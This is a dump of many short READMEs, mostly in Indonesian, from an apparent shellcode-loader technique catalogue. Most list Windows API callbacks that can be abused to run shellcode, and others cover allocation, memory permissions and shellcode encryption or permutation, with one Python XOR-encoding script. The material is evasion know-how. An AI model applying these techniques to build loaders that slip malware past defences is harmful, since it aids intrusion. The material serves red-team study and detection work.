13 | void * shmat(int shmid, const void * shmaddr, int shmflg);
14 | ```
15 | 
16 | ### Reference
17 | 
18 | - [Man 2](https://linux.die.net/man/2/shmat)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumChildWindows/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumChildWindows`.
 8 | 
 9 | ```c++
10 | BOOL EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumChildWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumchildwindows)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumThreadWindows/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumThreadWindows`.
 8 | 
 9 | ```c++
10 | BOOL EnumThreadWindows (DWORD dwThreadId, WNDENUMPROC lpfn, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumThreadWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumthreadwindows)


--------------------------------------------------------------------------------
/windows/execution/callback/ImmEnumInputContext/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `ImmEnumInputContext`.
 8 | 
 9 | ```c++
10 | BOOL ImmEnumInputContext (DWORD idThread, IMCENUMPROC lpfn, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN ImmEnumInputContext](https://docs.microsoft.com/en-us/windows/win32/api/imm/nf-imm-immenuminputcontext)


--------------------------------------------------------------------------------
/windows/execution/callback/acmDriverEnum/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `acmDriverEnum`.
 8 | 
 9 | ```c++
10 | MMRESULT ACMAPI acmDriverEnum(ACMDRIVERENUMCB fnCallback, DWORD_PTR dwInstance, DWORD fdwEnum);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN acmDriverEnum](https://learn.microsoft.com/en-us/windows/win32/api/msacm/nf-msacm-acmdriverenum)


--------------------------------------------------------------------------------
/windows/execution/fiber/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Eksekusi shellcode sebagai fiber.
6 | 
7 | Fiber merupakan unit eksekusi bersifat cooperative-multitasking. Serupa dengan thread, fiber berbagi ruang memory dengan thread/fiber lain dalam satu process.
8 | 
9 | Secara garis besar, shellcode yang telah diekstrak akan disalin ke ruang memory yang telah dialokasikan. Alamat shellcode kemudian menjadi fungsi entrypoint bagi fiber.


--------------------------------------------------------------------------------
/windows/execution/callback/EnumDesktopWindows/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumDesktopWindows`.
 8 | 
 9 | ```c++
10 | BOOL EnumDesktopWindows (HDESK hDesktop, WNDENUMPROC lpfn, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumDesktopWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopwindows)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemGeoID/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumSystemGeoID`.
 8 | 
 9 | ```c++
10 | BOOL EnumSystemGeoID (GEOCLASS GeoClass, GEOID ParentGeoId, GEO_ENUMPROC lpGeoEnumProc;
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumSystemGeoID](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemgeoid)


--------------------------------------------------------------------------------
/windows/writing/custom/bit-inverse/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Transforming the shellcode with custom algorithm.
4 | 
5 | ### Overview
6 | 
7 | Melakukan manipulasi bit berupa `inverse` untuk setiap bit pada byte shellcode.
8 | 
9 | Inverse adalah operasi mengganti bit dengan kebalikannya, yakni bit `1` menjadi `0` dan `0` menjadi `1`. Sebagai contoh, `0x90` dalam representasi binary adalah `1001 0000`. Operasi inverse akan menghasilkan nilai `0110 1111`.


--------------------------------------------------------------------------------
/windows/execution/callback/LdrEnumerateLoadedModules/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `LdrEnumerateLoadedModules`.
 8 | 
 9 | `LdrEnumerateLoadedModules` adalah fungsi internal dan bersifat low-level
10 | 
11 | ```c++
12 | NTSTATUS LdrEnumerateLoadedModules (BOOL ReservedFlag, LDR_ENUM_CALLBACK EnumProc, PVOID context);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | 


--------------------------------------------------------------------------------
/windows/writing/encryption/block/tea/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryption.
 4 | 
 5 | ### Overview
 6 | 
 7 | Menggunakan `Tiny Encryptio Algorithm` untuk melakukan enkripsi.
 8 | 
 9 | ### Reference
10 | 
11 | - [Wiki Tiny Encyrption Algorithm](https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm)
12 | - [Git Tiny Encyrption Algorithm implementation](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/TEA/code.c)


--------------------------------------------------------------------------------
/windows/writing/encryption/stream/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Enkripsi shellcode dengan stream cipher.
4 | 
5 | ### Overview
6 | 
7 | Stream cipher adalah jenis algoritma enkripsi kunci simetris dengan menggabungkan plaintext dengan keystream. Dalam stream cipher, setiap byte dalam plaintext dienkripsi satu per satu dengan digit pada ciphertext (stream).
8 | 
9 | Algoritma menggunakan kunci simetris dimana kunci yang sama digunakan untuk enkripsi dan dekripsi.


--------------------------------------------------------------------------------
/windows/execution/callback/CopyFile2/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CopyFile2`.
 8 | 
 9 | ```c++
10 | HRESULT CopyFile2 (PCWSTR pwszExistingFileName, PCWSTR pwszNewFileName, COPYFILE2_EXTENDED_PARAMETERS pExtendedParameters);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN CopyFile2](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfile2)


--------------------------------------------------------------------------------
/windows/execution/callback/DirectSoundEnumerate/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `DirectSoundEnumerate`.
 8 | 
 9 | ```c++
10 | HRESULT DirectSoundEnumerate (LPDSENUMCALLBACK lpDSEnumCallback, LPVOID lpContext);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN DirectSoundEnumerate](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ee416763(v=vs.85))


--------------------------------------------------------------------------------
/linux/storage/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | ### Overview
 4 | 
 5 | Teknik dalam `storage` adalah teknik yang digunakan untuk menyimpan shellcode sebelum dijalankan di memory. Shellcode dapat disimpan secara tersemat atau tertanam dalam loader, atau berada di luar loader sehingga harus didapatkan terlebih dahulu.
 6 | 
 7 | ### Catalog
 8 | 
 9 | Beberapa teknik `storage` yang diimplementasikan:
10 | 
11 | - [stack](stack): menyimpan shellcode pada stack sebuah fungsi.


--------------------------------------------------------------------------------
/windows/execution/thread/tls-callback/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Executing shellcode as a thread.
4 | 
5 | ### Overview
6 | 
7 | Thread Local Storage (TLS) callback dipanggil sebelum eksekusi entrypoint terjadi. Beberapa trik anti-debug dan anti-vm umum dilakukan sebagai TLS callback karena berada pada flow yang berbeda dengan entrypoint.
8 | 
9 | Jumlah TLS callback dapat lebih dari satu dan terkadang di dalam satu callback dapat dibuat callback lain saat runtime.


--------------------------------------------------------------------------------
/windows/execution/callback/CryptEnumOIDInfo/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CryptEnumOIDInfo`.
 8 | 
 9 | ```c++
10 | BOOL CryptEnumOIDInfo (DWORD dwGroupId, DWORD dwFlags, void pvArg, PFN_CRYPT_ENUM_OID_INFO pfnEnumOIDInfo);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN CryptEnumOIDInfo](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumoidinfo)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumDisplayMonitors/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumDisplayMonitors`.
 8 | 
 9 | ```c++
10 | BOOL EnumDisplayMonitors (HDC hdc, LPCRECT lprcClip, MONITORENUMPROC lpfnEnum, LPARAM dwData);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumDisplayMonitors](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdisplaymonitors)


--------------------------------------------------------------------------------
/windows/permission/VirtualProtect/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Change the memory protection of virtual address space.
 4 | 
 5 | ### Overview
 6 | 
 7 | Ubah permission dengan `VirtualProtect`.
 8 | 
 9 | ```c++
10 | BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD  flNewProtect, PDWORD lpflOldProtect);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)
16 | 


--------------------------------------------------------------------------------
/windows/writing/permutation/snake/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Reordering the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | Mengatur posisi byte dalam shellcode dengan pola mengular.
 8 | 
 9 | contoh:
10 | 
11 | ```
12 | awal: 
13 |     1  2  3  4
14 |     5  6  7  8
15 |     9 10 11 12
16 | hasil:
17 |     1 2 3 4 8 7 6 5 9 10 11 12
18 | ```
19 | 
20 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`.
21 | 
22 | ### Reference 
23 | 


--------------------------------------------------------------------------------
/windows/permission/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | ### Overview
 4 | 
 5 | Teknik dalam `permission` adalah teknik mengubah (aktifkan/nonaktifkan) executable bit pada area memory tertentu untuk mengindikasikan apakah area memory dapat dieksekusi.
 6 | 
 7 | ### Catalog
 8 | 
 9 | Daftar teknik perubahan `permission` yang diimplementasikan:
10 | 
11 | - [NtProtectVirtualMemory](NtProtectVirtualMemory)
12 | - [VirtualProtect](VirtualProtect)
13 | - [VirtualProtectEx](VirtualProtectEx)


--------------------------------------------------------------------------------
/linux/execution/thread/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Eksekusi shellcode sebagai thread terpisah dengan shared memory address (berbagi ruang memory antar thread dalam satu process). Terdapat beberapa fungsi Threading di Windows (public/internal) yang dapat dimanfaatkan untuk menjalankan thread. 
6 | 
7 | Secara garis besar, shellcode yang telah diekstrak akan disalin ke ruang memory yang telah dialokasikan. Alamat shellcode kemudian menjadi fungsi entrypoint bagi thread.


--------------------------------------------------------------------------------
/windows/execution/callback/EnumTimeFormatsEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumTimeFormatsEx`.
 8 | 
 9 | ```c++
10 | BOOL EnumTimeFormatsEx (TIMEFMT_ENUMPROCEX lpTimeFmtEnumProcEx, LPCWSTR lpLocaleName, DWORD dwFlags, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumTimeFormatsEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsex)


--------------------------------------------------------------------------------
/windows/execution/callback/InitOnceExecuteOnce/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `InitOnceExecuteOnce`.
 8 | 
 9 | ```c++
10 | BOOL InitOnceExecuteOnce (PINIT_ONCE InitOnce, PINIT_ONCE_FN InitFn, PVOID Parameter, LPVOID *Context);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN InitOnceExecuteOnce](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-initonceexecuteonce)


--------------------------------------------------------------------------------
/windows/execution/callback/PlaExtractCabinet/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `PlaExtractCabinet`.
 8 | 
 9 | ```c++
10 | HRESULT PlaExtractCabinet (PCWSTR CabFileName, PCWSTR DestPath, PLA_CABEXTRACT_CALLBACK Callback, PVOID Context);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [github pla.h](https://github.com/nihon-tc/Rtest/blob/master/header/Microsoft%20SDKs/Windows/v7.0A/Include/pla.h)


--------------------------------------------------------------------------------
/windows/execution/thread/SHCreateThread/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `SHCreateThread`.
 8 | 
 9 | ```c++
10 | BOOL SHCreateThread (LPTHREAD_START_ROUTINE pfnThreadProc, void * pData, SHCT_FLAGS flags, LPTHREAD_START_ROUTINE pfnCallback);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN SHCreateThread](https://docs.microsoft.com/en-us/windows/win32/api/shlwapi/nf-shlwapi-shcreatethread)


--------------------------------------------------------------------------------
/windows/execution/callback/DirectSoundCaptureEnumerate/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `DirectSoundCaptureEnumerate`.
 8 | 
 9 | ```c++
10 | HRESULT DirectSoundCaptureEnumerate (LPDSENUMCALLBACK lpDSEnumCallback, LPVOID lpContext);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN DirectSoundCaptureEnumerate](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ee416761(v=vs.85))


--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemLocalesEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumSystemLocalesEx`.
 8 | 
 9 | ```c++
10 | BOOL EnumSystemLocalesEx (LOCALE_ENUMPROCEX lpLocaleEnumProcEx, DWORD dwFlags, LPARAM lParam, LPVOID lpReserved);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumSystemLocalesEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesex)


--------------------------------------------------------------------------------
/windows/execution/thread/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Eksekusi shellcode sebagai thread terpisah dengan shared memory address (berbagi ruang memory antar thread dalam satu process). Terdapat beberapa fungsi Threading di Windows (public/internal) yang dapat dimanfaatkan untuk menjalankan thread. 
6 | 
7 | Secara garis besar, shellcode yang telah diekstrak akan disalin ke ruang memory yang telah dialokasikan. Alamat shellcode kemudian menjadi fungsi entrypoint bagi thread.


--------------------------------------------------------------------------------
/windows/writing/encryption/block/xtea/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryption.
 4 | 
 5 | ### Overview
 6 | 
 7 | Menggunakan `eXtended Tiny Encryptio Algorithm (XTEA)` untuk melakukan enkripsi.
 8 | 
 9 | ### References
10 | 
11 | - [Reversing.ID XTEA Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/XTEA)
12 | - [Reversing.ID XTEA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/XTEA/code.c)


--------------------------------------------------------------------------------
/linux/allocation/posix_memalign/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `posix_memalign`. Fungsi `posix_memalign` bekerja dengan mengalokasikan block memory yang dimulai dari alamat kelipatan page.
 8 | 
 9 | ```c++
10 | #include <stdlib.h>
11 | 
12 | int posix_memalign(void **memptr, size_t alignment, size_t size);
13 | ```
14 | 
15 | ### Reference
16 | 
17 | - [Man 3](https://linux.die.net/man/3/posix_memalign)


--------------------------------------------------------------------------------
/windows/execution/callback/CertEnumSystemStore/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CertEnumSystemStore`.
 8 | 
 9 | ```c++
10 | BOOL CertEnumSystemStore (DWORD dwFlags, void pvSystemStoreLocationPara, void pvArg, PFN_CERT_ENUM_SYSTEM_STORE pfnEnum);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN CertEnumSystemStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumsystemstore)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumDateFormatsExEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumDateFormatsExEx`.
 8 | 
 9 | ```c++
10 | BOOL EnumDateFormatsExEx (DATEFMT_ENUMPROCEXEX lpDateFmtEnumProcExEx, LPCWSTR lpLocaleName, DWORD dwFlags, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumDateFormatsExEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexex)


--------------------------------------------------------------------------------
/windows/permission/VirtualProtectEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Change the memory protection of virtual address space.
 4 | 
 5 | ### Overview
 6 | 
 7 | Ubah permission dengan `VirtualProtectEx`.
 8 | 
 9 | ```c++
10 | BOOL VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD  flNewProtect, PDWORD lpflOldProtect);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN VirtualProtectEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex)
16 | 


--------------------------------------------------------------------------------
/windows/writing/permutation/rail-fence/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Reordering the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | Mengatur posisi byte dalam shellcode menggunakan algoritma rail-fence (zig-zag) cipher. 
 8 | 
 9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`.
10 | 
11 | ### Reference 
12 | 
13 | - [Wiki Rail-Fence Cipher](https://en.wikipedia.org/wiki/Rail_fence_cipher)
14 | - [online encoder/decoder](https://www.dcode.fr/rail-fence-cipher)


--------------------------------------------------------------------------------
/windows/execution/callback/CertEnumPhysicalStore/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CertEnumPhysicalStore`.
 8 | 
 9 | ```c++
10 | BOOL CertEnumPhysicalStore (const void *pvSystemStore, DWORD dwFlags, void *pvArg, PFN_CERT_ENUM_PHYSICAL_STORE pfnEnum);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN CertEnumPhysicalStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumphysicalstore)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumerateLoadedModules/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumerateLoadedModules`.
 8 | 
 9 | ```c++
10 | BOOL EnumerateLoadedModules (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK EnumLoadedModulesCallback, PVOID UserContext);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumerateLoadedModules](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodules)


--------------------------------------------------------------------------------
/windows/execution/callback/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Melakukan penyalahgunaan windows API untuk mengeksekusi shellcode sebagai callback.
6 | 
7 | Sebagian windows API menerima callback yang akan dijalankan untuk menangani objek atau memproses hasil operasi. Dengan menjalankan shellcode sebagai callback, kode menjadi lebih tersamarkan karena pemanggilan shellcode menjadi implisit.
8 | 
9 | Umumnya callback akan berjalan pada thread yang sama dengan thread yang memanggil fungsi windows API.


--------------------------------------------------------------------------------
/windows/writing/copy/WriteProcessMemory/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Writing shellcode to allocated memory.
 4 | 
 5 | ### Overview
 6 | 
 7 | Penyalinan shellcode menggunakan `WriteProcessMemory`.
 8 | 
 9 | ```c++
10 | BOOL WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
11 | ```
12 | 
13 | ### Reference
14 | 
15 | - [MSDN WriteProcessMemory](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)


--------------------------------------------------------------------------------
/windows/writing/permutation/spiral/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Reordering the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | Mengatur posisi byte dalam shellcode dengan pola spiral.
 8 | 
 9 | contoh:
10 | 
11 | ```
12 | awal: 
13 |      1  2  3  4
14 |      5  6  7  8
15 |      9 10 11 12
16 |     13 14 15 16
17 | hasil:
18 |     1 2 3 4 8 12 16 15 14 13 9 5 6 7 11 10
19 | ```
20 | 
21 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`.
22 | 
23 | ### Reference 
24 | 


--------------------------------------------------------------------------------
/windows/execution/callback/FindDebugInfoFileEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `FindDebugInfoFileEx`.
 8 | 
 9 | ```c++
10 | HANDLE FindDebugInfoFileEx (PCSTR FileName, PCSTR SymbolPath, PSTR DebugFilePath, PFIND_DEBUG_FILE_CALLBACK Callback, PVOID CallerData);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN FindDebugInfoFileEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-finddebuginfofileex)


--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and 
 2 | # generate the encoded shellcode
 3 | 
 4 | import random
 5 | 
 6 | with open("shellcode.bin", "rb") as f:
 7 |     shcode = f.read()
 8 | 
 9 | # generate single byte key
10 | key = random.randrange(1, 255)
11 | 
12 | # xor-encrypt
13 | enc_shcode = [key] + [ c ^ key for c in shcode ]
14 | 
15 | # print as C-array
16 | print("{ ", end='')
17 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
18 | print(" }")


--------------------------------------------------------------------------------
/windows/allocation/AllocADsMem/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `AllocADsMem`.
 8 | 
 9 | ```c++
10 | LPVOID AllocADsMem (DWORD cb);
11 | 
12 | BOOL FreeADsMem (LPVOID pMem);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN AllocADsMem](https://docs.microsoft.com/en-us/windows/win32/api/adshlp/nf-adshlp-allocadsmem)
18 | - [MSDN FreeADsMem](https://docs.microsoft.com/en-us/windows/win32/api/adshlp/nf-adshlp-freeadsmem)


--------------------------------------------------------------------------------
/windows/execution/callback/CertEnumSystemStoreLocation/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CertEnumSystemStoreLocation`.
 8 | 
 9 | ```c++
10 | BOOL CertEnumSystemStoreLocation (DWORD dwFlags, void * pvArg, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION pfnEnum);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN CertEnumSystemStoreLocation](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumsystemstorelocation)


--------------------------------------------------------------------------------
/windows/execution/callback/ImageGetDigestStream/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `ImageGetDigestStream`.
 8 | 
 9 | ```c++
10 | BOOL IMAGEAPI ImageGetDigestStream (HANDLE FileHandle, DWORD DigestLevel, DIGEST_FUNCTION DigestFunction, DIGEST_HANDLE DigestHandle);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN ImageGetDigestStream](https://docs.microsoft.com/en-us/windows/win32/api/imagehlp/nf-imagehlp-imagegetdigeststream)


--------------------------------------------------------------------------------
/windows/execution/callback/FindExecutableImageEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `FindExecutableImageEx`.
 8 | 
 9 | ```c++
10 | HANDLE FindExecutableImageEx (PCSTR FileName, PCSTR SymbolPath, PSTR ImageFilePath, PFIND_EXE_FILE_CALLBACK Callback, PVOID CallerData);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN FindExecutableImageEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-findexecutableimageex)


--------------------------------------------------------------------------------
/windows/execution/thread/TrySubmitThreadpoolCallback/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `TrySubmitThreadpoolCallback`.
 8 | 
 9 | ```c++
10 | BOOL TrySubmitThreadpoolCallback(PTP_SIMPLE_CALLBACK pfns, PVOID pv,PTP_CALLBACK_ENVIRON pcbe);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN TrySubmitThreadpoolCallback](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-trysubmitthreadpoolcallback)


--------------------------------------------------------------------------------
/windows/execution/callback/CryptEnumOIDFunction/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CryptEnumOIDFunction`.
 8 | 
 9 | ```c++
10 | BOOL CryptEnumOIDFunction (DWORD dwEncodingType, LPCSTR pszFuncName, LPCSTR pszOID, DWORD dwFlags, void *pvArg, PFN_CRYPT_ENUM_OID_FUNC pfnEnumOIDFunc);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN CryptEnumOIDFunction](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumoidfunction)


